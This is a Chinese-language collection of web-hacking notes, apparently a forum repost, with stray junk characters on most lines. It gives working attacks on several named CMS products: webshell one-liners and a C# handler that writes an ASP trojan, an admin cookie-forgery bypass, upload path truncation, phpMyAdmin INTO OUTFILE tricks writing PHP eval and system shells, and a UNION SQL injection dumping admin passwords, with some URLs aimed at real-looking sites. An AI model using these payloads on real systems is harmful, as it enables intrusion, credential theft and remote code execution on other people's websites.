2 |& u v3 v- W; `<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">9 d( K4 }& _; J. N& ^. q/ A; V
Upload a new file:<br>" X0 f& W* Y: F6 y, x, |% t8 R/ Q
<input type="file" name="NewFile" size="50"><br>, q; o3 W0 L, p% g9 q! z7 c% |
<input id="btnUpload" type="submit" value="Upload">& N: i- W# |3 ?. S
</form>
9 ]2 M M% r3 T' k" g-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------% I |$ d) e( g: t6 g6 _
! H9 q) M W7 C- }
SDcms 后台拿webshell; r# i: {+ K4 F. }6 U
# O v ~! {, j9 D2 S' R/ Y9 c
第一种方法:; a8 W' Z! B# L2 J$ F4 {
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
5 P% q3 @0 s8 C把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx, D! [7 l7 _ m; \: G9 _. Y2 ?8 U
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。# R4 c- _9 d# S& r- j' ~1 c5 z7 J" f
第二种方法:# k3 p U# k4 e* @1 x7 q
进入后台-->系统管理-->系统设置-->系统设置->上传设置;/ T8 Z. { h$ |0 m2 l$ _8 [
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
8 D$ z/ Q/ s/ m W! s6 ], h) \0 N第三种方法:
. I, i+ p( M9 \3 ~! |. R, b; W进入后台-->界面管理-->模板文件管理-->创建文件2 e7 F9 M( {/ b' F
文件名写入getshell.ashx$ S4 {: h7 \) W% c' x
内容写入下面内容:
: C( [: O Q [) b/ T/====================复制下面的=========================/ J. T2 p; c5 _3 ?, {
<%@ WebHandler Language="C#" Class="Handler" %>
( @) a! o2 v3 C! b5 ?using System;
! A9 ]8 R1 W) W/ D, o9 d* K# pusing System.Web;
7 A1 o; D4 g$ o9 B( K: V+ n9 Jusing System.IO;( `! p: R: Y+ L
public class Handler : IHttpHandler {
; i6 }- E/ L" v' p: _$ wpublic void ProcessRequest (HttpContext context) {% \/ m. U& K8 s, F
context.Response.ContentType = "text/plain";
9 G" o& B4 ?* C GStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));9 k" I3 c( W! n7 }4 T& r+ ], |2 F
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
/ h$ R3 _( \7 ~& z2 A8 \file1.Flush();
1 |' h# ^7 b9 e. r4 X% m$ Afile1.Close();# E; b+ {9 }0 T1 U) i9 I5 K6 W
}5 y+ u! p: A9 O! V" s. K
public bool IsReusable {
3 Z( c! b* l( l# d# eget {5 N9 ]4 a8 `! a9 Q; Q
return false;* W; D' m9 l1 C6 S% H) z7 z
}8 B( C9 k8 W/ {: X
}2 M% @0 b# b9 l5 ~
}' u$ O5 R6 e) o6 q8 l4 `
/=============================================/3 R/ `1 D8 i# Q0 c5 ~6 |
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
/ M0 G' W, @5 s9 {3 |9 @会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
8 k$ k7 z; S* ~-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 c9 K. l% d* ^2 @' E
$ |" j0 s4 O; eESCMS网站管理系统0day; U' h5 s. l) O6 B
, {/ i ~- K1 g3 c$ \2 ?后台登陆验证是通过admin/check.asp实现的
8 P D) C" W T. v0 M' i6 F+ C2 D. B2 o" r7 S$ L6 T6 K5 t
首先我们打开http://target.com/admin/es_index.html* x3 [" }& U8 Y0 Q2 [7 z/ d$ `
然后在COOKIE结尾加上( F3 [! G# j' E
; ESCMS$_SP2=ES_admin=st0p;+ K, ~9 O/ `" r8 ` Q
修改,然后刷新
6 ]% p/ t$ G# j* \8 |. [进后台了嘎..9 W$ A, e& |' b9 i
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL+ n) z9 o. z# b9 p$ ]/ P
0 J* b+ b0 P% i8 w9 Q* M) ?
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.8 W- X( v( o6 B M" G) A9 ?
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
1 m! b- x6 s) J- `2 l3 N7 m存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
. |+ F7 g! ~; z" e' a% _/ A% @在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了$ C# X+ ? S l8 t
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 I' L; b0 C5 C
* \5 `' Z1 G7 R! L. s宁志网站管理系统后台无验证漏洞及修复% n9 i0 k9 a# B6 T: ~8 s: T
. V p/ P/ k0 S+ t& ~0 y9 {1 [6 T网上搜了一下,好像没有发布.如有雷同纯粹巧合!
0 h# e" k( j' l) i: l8 r2 j4 z官方网站:www.ningzhi.net% k% ]9 X- `+ g9 t# ]* A* h, X
学校网站管理系统 V.2011版本
! _$ B. W" S" x# ~http://down.chinaz.com/soft/29943.htm 9 W9 l; H+ j3 v' ?& u7 r3 s7 ?
其它版本(如:政府版等),自行下载.9 l- \3 x4 ?6 q
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~$ y4 q" U6 V: d0 _( E% _1 m
login.asp代码如下:, {6 q5 n. |3 w( H5 B% F
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
7 E/ H4 A% X; _- e* k: I% Hmanage.asp代码我就不帖出来了.反正也没验证.
" K3 o7 J$ Z3 O. a) D- [' p3 z! j只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
1 q+ k4 ?( h- Z漏洞利用:$ I1 U _ E8 h7 i3 J! k/ w9 W' ?
直接访问http://www.0855.tv/admin/manage.asp
+ Z- d8 L/ n1 f6 o数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web51 G [- p8 [( E7 X e$ k* O
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 x9 y- Y& B6 _# R) q' u
; d' s; W" V5 O- ]phpmyadmin拿shell的四种方法总结及修复
& i( c0 y6 Y a. Q0 q# Z& s
7 `" v7 r2 B. y3 c+ _方法一:& h$ t# H5 B" ?4 n$ u
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );, Z% O5 c3 ^2 x, P
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
0 V* j! B. }2 _) a; q" uSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
4 L8 I @# r& k& ]----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
. K7 d% G( K# L: u+ Q: i8 N; { 一句话连接密码:7on% M, o- C( r7 d, A+ d* D/ I; W; ?
方法二: Q9 ]& L# w9 a* ]
读取文件内容: select load_file('E:/xamp/www/s.php');
! ^( I: z' ]5 H0 K) ]写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'2 {. t' O* d/ P7 ^! D; g' c( X
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'( g: T* R% c& A: W: K# `& L
方法三:
1 C1 y( D0 I4 h! f3 N, P$ ~5 iJhackJ版本 PHPmyadmin拿shell% j2 l1 t# Q1 c; w2 V7 o9 _2 B* |
Create TABLE study (cmd text NOT NULL);1 n# |9 E) q/ W! p9 t- H4 f
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');# T" V b! K. q* C# ~, ?
select cmd from study into outfile 'E:/wamp/www/7.php';- s; o7 u4 h: L" p1 c( L2 H5 s
Drop TABLE IF EXISTS study;
& g/ Q7 U' n7 C9 C<?php eval($_POST[cmd])?>4 E9 @* Z+ @% r. R6 Q
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
9 N0 J' G# S1 M- LINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 13 h8 X8 O' U7 M3 I' V9 E
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
# M Y2 Z+ f' T: [DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
, j: G4 s* x. d& K2 k; v5 t方法四:/ y0 q6 a1 |* D# ~" c4 B' |; q
select load_file('E:/xamp/www/study.php');/ d2 n' n' R* x( O& }2 J
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
% \7 ]; d7 u- [( |! S& r然后访问网站目录:http://www.2cto.com/study.php?cmd=dir8 K8 i& S! t7 d1 @7 e2 @- {( R( W+ s
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
( c# a, \. Q- x. q+ n; o; C, `1 S4 M; I& ~: x [* T
NO.001中学网站管理系统 Build 110628 注入漏洞
0 E6 ^% |% ^7 B: ?
5 w7 | T* k/ P5 j- n1 HNO.001中学网站管理系统功能模块:, E7 i: c; `3 L% _3 E5 Y
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等% b7 j" @, y3 `. a2 C) B
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息- o% X) W$ l; K/ `4 b( S) f
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息" z9 l8 i) R% ? d
4.视频图片管理:一级分类,动态添加视频或者图片等信息# l" b1 }( O6 e0 d$ p
5.留言管理:对留言,修改,删除、回复等管理
9 k( m6 X+ S! x: w+ W/ n& H: H6.校友频道:包括校友资料excel导出、管理等功能8 w: M5 b# H3 b+ x/ Z9 e
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
' T: R1 ]3 A( p7 H$ K5 s8 T- D4 M% w默认后台:admin/login.asp( i5 J/ @ A1 a% C7 V+ I0 U& D& s
官方演示:http://demo.001cms.net3 \2 k" d) W: [; S- E. y" m
源码下载地址:http://down.chinaz.com/soft/30187.htm; `' z4 r$ z2 D. s$ B9 M$ u9 @! ?
EXP:
$ z" o" c" f4 |( Funion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
( `/ c: p6 J6 p0 n6 t测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
, P" k A/ o& U2 d( P' Mgetshell:后台有备份,你懂的& S, T; t9 i. G( b! a2 M
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
5 K o! @& C5 ]$ ]- |- g------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |